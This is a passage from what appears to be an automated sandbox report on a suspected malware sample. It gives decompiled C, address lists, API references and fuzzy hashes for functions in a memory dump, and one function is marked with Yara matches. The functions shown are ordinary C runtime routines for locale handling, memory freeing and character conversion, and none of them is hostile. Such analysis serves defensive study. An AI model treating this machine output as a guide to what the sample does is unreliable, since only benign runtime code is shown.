										E0009375B("��",  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0xae2e4; // 0xae2e8
										_t32 = _t77 + 0x84; // 0xaed00
										 *0xaecf8 =  *_t32;
										_t33 = _t77 + 0x90; // 0xa9570
										 *0xaed54 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0xae178 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E000990E0();
							}
						}
						_v8 = 0xfffffffe;
						E00099113(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00094196(__eflags))) = 0x16;
						E000940E7();
						_t45 = 0;
					}
					return E00092835(_t45);
				}
				L20:
			}

APIs

__calloc_crt.LIBCMT ref: 00098FE6
__lock.LIBCMT ref: 00098FFC
__copytlocinfo_nolock.LIBCMT ref: 0009900D
__wsetlocale_nolock.LIBCMT ref: 00099024
__lock.LIBCMT ref: 0009905E
__updatetlocinfoEx_nolock.LIBCMT ref: 00099070
___removelocaleref.LIBCMT ref: 00099076
__updatetlocinfoEx_nolock.LIBCMT ref: 00099095

Strings

, xrefs: 00099090, 0009909C

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
String ID:
API String ID: 790675137-2599400749
Opcode ID: f10b41ae5d2b567018f9102bd33a8dd03ea61db9b6a807298e2deee4537b72c8
Instruction ID: 34fa5f32ff1382576646ec1ec41aad014c6188766e5efbf1e73dae29dbb38186
Opcode Fuzzy Hash: f10b41ae5d2b567018f9102bd33a8dd03ea61db9b6a807298e2deee4537b72c8
Instruction Fuzzy Hash: E941C132504305AFDF20AFA8DD82BDD7BE5AF45314F10842DFA1896293DB768641EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0009197C, Relevance: 18.1, APIs: 12, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0009197C(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t27;

				_t14 = __ebx;
				__imp__DecodePointer( *0xf1b34);
				_t25 =  *0xefcfc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E000932B6( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0xefcfc; // 0x0
				}
				_push(_t14);
				E000932B6(_t25);
				_t26 =  *0xefcf8; // 0x0
				 *0xefcfc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E000932B6( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0xefcf8; // 0x0
				}
				E000932B6(_t26);
				 *0xefcf8 = 0;
				E000932B6( *0xefcf4);
				_t5 = E000932B6( *0xefcf0);
				_t27 = _t26 | 0xffffffff;
				 *0xefcf4 = 0;
				 *0xefcf0 = 0;
				if(_t24 != _t27 &&  *0xf1b34 != 0) {
					_t5 = E000932B6(_t24);
				}
				__imp__EncodePointer(_t27);
				 *0xf1b34 = _t5;
				_t6 =  *0xf06f4;
				if( *0xf06f4 != 0) {
					E000932B6(_t6);
					 *0xf06f4 = 0;
				}
				_t7 =  *0xf06f8;
				if( *0xf06f8 != 0) {
					E000932B6(_t7);
					 *0xf06f8 = 0;
				}
				_t8 =  *0xae7d4; // 0xae5b0
				asm("lock xadd [eax], esi");
				if(_t27 == 1) {
					_t8 =  *0xae7d4; // 0xae5b0
					if(_t8 != 0xae5b0) {
						_t9 = E000932B6(_t8);
						 *0xae7d4 = 0xae5b0;
						return _t9;
					}
				}
				return _t8;
			}

0x0009197c
0x00091984
0x0009198a
0x00091990
0x00091994
0x00091996
0x0009199d
0x000919a3
0x000919a6
0x00000000
0x00000000
0x00000000
0x000919a6
0x000919a8
0x000919a8
0x000919ae
0x000919b0
0x000919b5
0x000919bd
0x000919c6
0x000919c8
0x000919ce
0x000919d4
0x000919d7
0x00000000
0x00000000
0x00000000
0x000919d7
0x000919d9
0x000919d9
0x000919e0
0x000919eb
0x000919f1
0x000919fc
0x00091a01
0x00091a04
0x00091a0d
0x00091a15
0x00091a20
0x00091a25
0x00091a27
0x00091a2d
0x00091a32
0x00091a39
0x00091a3c
0x00091a42
0x00091a42
0x00091a48
0x00091a4f
0x00091a52
0x00091a58
0x00091a58
0x00091a5e
0x00091a63
0x00091a69
0x00091a6b
0x00091a77
0x00091a7a
0x00091a80
0x00000000
0x00091a80
0x00091a77
0x00091a88

APIs

DecodePointer.KERNEL32 ref: 00091984
_free.LIBCMT ref: 0009199D

Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC

_free.LIBCMT ref: 000919B0
_free.LIBCMT ref: 000919CE
_free.LIBCMT ref: 000919E0
_free.LIBCMT ref: 000919F1
_free.LIBCMT ref: 000919FC
_free.LIBCMT ref: 00091A20
EncodePointer.KERNEL32(00000000), ref: 00091A27
_free.LIBCMT ref: 00091A3C
_free.LIBCMT ref: 00091A52
_free.LIBCMT ref: 00091A7A

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
Instruction ID: 55037b5f61b98b7ab115b077da11ff23c629134b0c359b20dc8f913433ebceba
Opcode Fuzzy Hash: f1b5dea3613244f58a2e6143bac3bdcc1bc1737f7ab558a5f3c72a8425d1a790
Instruction Fuzzy Hash: 98217E72B061538FEF609F24FD809A9B7E5AB06B213350039EC14A7266DF388D44EB81

Uniqueness

Uniqueness Score: -1.00%

Function 000917CB, Relevance: 15.1, APIs: 10, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E000917CB(void* __edx, char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				intOrPtr* _t7;
				intOrPtr _t9;
				short* _t10;
				short* _t12;
				short* _t14;
				int _t15;
				short* _t22;
				int _t24;
				void* _t27;
				void* _t31;
				short* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_push(_t27);
				_t24 = 0;
				_t36 = _a4;
				if(_a4 != 0) {
					_t33 = _a8;
					__eflags = _t33;
					if(__eflags == 0) {
						goto L1;
					}
					_t10 = E00092D64(_t27);
					__eflags = _t10;
					if(_t10 == 0) {
						_t22 = AreFileApisANSI();
						__eflags = _t22;
						if(_t22 == 0) {
							_t24 = 1;
							__eflags = 1;
						}
					}
					 *_t33 = 0;
					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
					_v8 = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00093336(_t31, _t12 + _t12);
						 *_t33 = _t14;
						__eflags = _t14;
						if(_t14 == 0) {
							goto L9;
						}
						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
						__eflags = _t15;
						if(_t15 != 0) {
							_t9 = 1;
							__eflags = 1;
							goto L14;
						}
						E00094175(GetLastError());
						E000932B6( *_t33);
						 *_t33 =  *_t33 & 0x00000000;
						goto L8;
					} else {
						E00094175(GetLastError());
						L8:
						L9:
						_t9 = 0;
						L14:
						return _t9;
					}
				}
				L1:
				_t7 = E00094196(_t36);
				_t34 = 0x16;
				 *_t7 = _t34;
				E000940E7();
				_t9 = _t34;
				goto L14;
			}

APIs

___crtIsPackagedApp.LIBCMT ref: 000917F5
AreFileApisANSI.KERNEL32 ref: 000917FE
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00091818
GetLastError.KERNEL32 ref: 00091825
__dosmaperr.LIBCMT ref: 0009182C

Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
String ID:
API String ID: 1083238821-0
Opcode ID: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
Instruction ID: 024ed592de540ba5a6cdae41f488b0d52b33d50c810ab537c6bc44784393a71c
Opcode Fuzzy Hash: c3c277f0404f2e6dcc4893b4301a4623c80ff8c853f5cab2e5fa7c087b45cab1
Instruction Fuzzy Hash: 34118EB2604206BFEF606FB09C08EEBB6ECEF05761B208528F951D5192EE30C841B760

Uniqueness

Uniqueness Score: -1.00%

Function 00091DCF, Relevance: 12.2, APIs: 8, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00091DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xacd50);
				E000927F0(__ebx, __edi, __esi);
				E00093117(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E000932EE();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xefd20 = _t82;
					 *0xf1b28 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xefd20; // 0x0
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 =  *0xefd20 + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xf1a80;
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -982292
											E00092D36(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E0009207A();
						_t86 = 0;
						L49:
						return E00092835(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0xf1b28 < _t135) {
						_t138 = E000932EE(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							0xefd20[_t149] = _t138;
							 *0xf1b28 =  *0xf1b28 + _t141;
							while(_t138 <  &(0xefd20[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xf1b28;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = 0xefd20[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E00092D36(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E00094E90(_t155, 0xaece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}

0x00091dcf
0x00091dd1
0x00091dd6
0x00091ddd
0x00091de5
0x00091de8
0x00091dec
0x00091ded
0x00091dee
0x00091df5
0x00091df7
0x00091dfc
0x00091e19
0x00091e1e
0x00091e24
0x00091e2d
0x00091e33
0x00091e36
0x00091e39
0x00091e42
0x00091e45
0x00091e4b
0x00091e4e
0x00091e51
0x00091e54
0x00091e57
0x00091e57
0x00091e62
0x00091e6d
0x00091fa2
0x00091fa4
0x00091fa5
0x00091fa5
0x00091fa7
0x00091fa7
0x00091fad
0x00000000
0x00000000
0x00091fb8
0x00091fbe
0x00091fc4
0x00091fd8
0x00091fde
0x00091fe5
0x00091fea
0x00091fec
0x00091fe0
0x00091fe2
0x00091fe2
0x00091ff0
0x00091ff6
0x00091ffc
0x0009204a
0x00092050
0x00092053
0x00092055
0x0009205c
0x00092061
0x00092061
0x00000000
0x00092002
0x00092003
0x0009200b
0x00000000
0x00000000
0x00092010
0x00092012
0x0009201a
0x00092027
0x00092032
0x00092039
0x0009203d
0x00092042
0x00092045
0x00000000
0x00092045
0x0009202d
0x0009202f
0x0009202f
0x00000000
0x0009202f
0x00092020
0x00000000
0x00092020
0x00091fca
0x00091fd0
0x00092064
0x00092064
0x00000000
0x00092064
0x00091fc4
0x0009206a
0x0009206d
0x00092072
0x00092074
0x00092079
0x00092079
0x00091e73
0x00091e78
0x00000000
0x00000000
0x00091e7e
0x00091e80
0x00091e83
0x00091e86
0x00091e8b
0x00091e95
0x00091e97
0x00091e99
0x00091e99
0x00091e9e
0x00091e9f
0x00091ea2
0x00091eb4
0x00091eb6
0x00091ebb
0x00091f55
0x00091f5c
0x00091f62
0x00091f72
0x00091f78
0x00091f7b
0x00091f7e
0x00091f82
0x00091f88
0x00091f8b
0x00091f8e
0x00091f91
0x00091f91
0x00091f96
0x00091f97
0x00091f9a
0x00000000
0x00091f9a
0x00091ec1
0x00091ec7
0x00000000
0x00091ec7
0x00091eca
0x00091ecc
0x00091ed1
0x00091ed2
0x00091ed5
0x00091ed8
0x00091ee0
0x00091ee5
0x00091f42
0x00091f42
0x00091f43
0x00091f49
0x00091f4a
0x00091f4d
0x00091f50
0x00000000
0x00091eeb
0x00091eeb
0x00091eef
0x00000000
0x00000000
0x00091ef3
0x00091f03
0x00091f10
0x00091f17
0x00091f1c
0x00091f23
0x00091f2d
0x00091f31
0x00091f36
0x00091f39
0x00091f3c
0x00091f3f
0x00091f3f
0x00000000
0x00091f3f
0x00091ef6
0x00091efc
0x00091f01
0x00000000
0x00000000
0x00000000
0x00091f01
0x00091ee5
0x00000000
0x00091ed8
0x00091e11
0x00000000

APIs

__lock.LIBCMT ref: 00091DDD

Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142

__calloc_crt.LIBCMT ref: 00091DEE

Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD

@_EH4_CallFilterFunc@8.LIBCMT ref: 00091E09
GetStartupInfoW.KERNEL32(?,000ACD50,00000064,00091146,000ACCC0,00000014), ref: 00091E62
__calloc_crt.LIBCMT ref: 00091EAD
GetFileType.KERNEL32(00000001), ref: 00091EF6

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 2621518576-0
Opcode ID: 5e9fcf483146f10413883ca7f10e6759a0de71e2087d0f3c8e1298bb31543eaf
Instruction ID: f7c14dc26cf176d419ad1a3d534759837349f44964dcf94711b9ad3e31d60c39
Opcode Fuzzy Hash: 5e9fcf483146f10413883ca7f10e6759a0de71e2087d0f3c8e1298bb31543eaf
Instruction Fuzzy Hash: B281B471A0424A9FDF24CF64CC515EDBBF0BF49324B24426DD4A6AB3D1D7399802EB54

Uniqueness

Uniqueness Score: -1.00%

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x2327c9ba
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x004078d4
0x004078d5
0x004078d6
0x004078dd
0x004078e2
0x004078e8
0x004078ee
0x004078f4
0x004078f7
0x004078f7
0x004078fa
0x004078fc
0x004078fc
0x004078fa
0x004078fe
0x00407903
0x0040790a
0x0040790d
0x0040790d
0x00407929
0x0040792f
0x00407934
0x00407ac7
0x00407ad2
0x00407ada
0x0040793a
0x0040793a
0x0040793d
0x00407942
0x00407946
0x0040799a
0x0040799a
0x0040799c
0x0040799e
0x00407abc
0x00407abc
0x00407abe
0x00407abf
0x00407ac5
0x00000000
0x00407ac5
0x004079af
0x004079b5
0x004079b7
0x00000000
0x00000000
0x004079bd
0x004079cf
0x004079d4
0x004079d8
0x00000000
0x00000000
0x004079e5
0x00407a1f
0x00407a22
0x00407a25
0x00407a27
0x00407a29
0x00407a2b
0x00407a77
0x00407a77
0x00407a79
0x00407a79
0x00407a7b
0x00407ab5
0x00407ab6
0x00000000
0x00407abb
0x00407a8f
0x00407a94
0x00407a96
0x00000000
0x00000000
0x00407a9a
0x00407a9b
0x00407a9c
0x00407a9f
0x00407adb
0x00407ade
0x00407aa1
0x00407aa1
0x00407aa2
0x00407aa2
0x00407aaf
0x00407ab1
0x00407ab3
0x00407ae4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab3
0x00407a2d
0x00407a30
0x00407a32
0x00407a34
0x00407a36
0x00407a39
0x00407a3e
0x00407a59
0x00407a5b
0x00407a65
0x00407a67
0x00407a68
0x00407a6a
0x00000000
0x00000000
0x00407a6c
0x00407a72
0x00407a72
0x00000000
0x00407a72
0x00407a40
0x00407a42
0x00407a46
0x00407a4b
0x00407a4d
0x00407a4f
0x00000000
0x00000000
0x00407a51
0x00000000
0x00407a51
0x004079e7
0x004079ec
0x00000000
0x00000000
0x004079f2
0x004079f4
0x00000000
0x00000000
0x00407a10
0x00407a14
0x00000000
0x00000000
0x00000000
0x00407a1a
0x0040794d
0x0040794f
0x00407951
0x00407959
0x00407978
0x0040797a
0x00407984
0x00407986
0x00407987
0x00407989
0x00000000
0x00000000
0x0040798f
0x00407995
0x00407995
0x00000000
0x00407995
0x0040795d
0x00407961
0x00407966
0x0040796a
0x00000000
0x00000000
0x00407970
0x00000000
0x00407970

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x2327c9ba
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
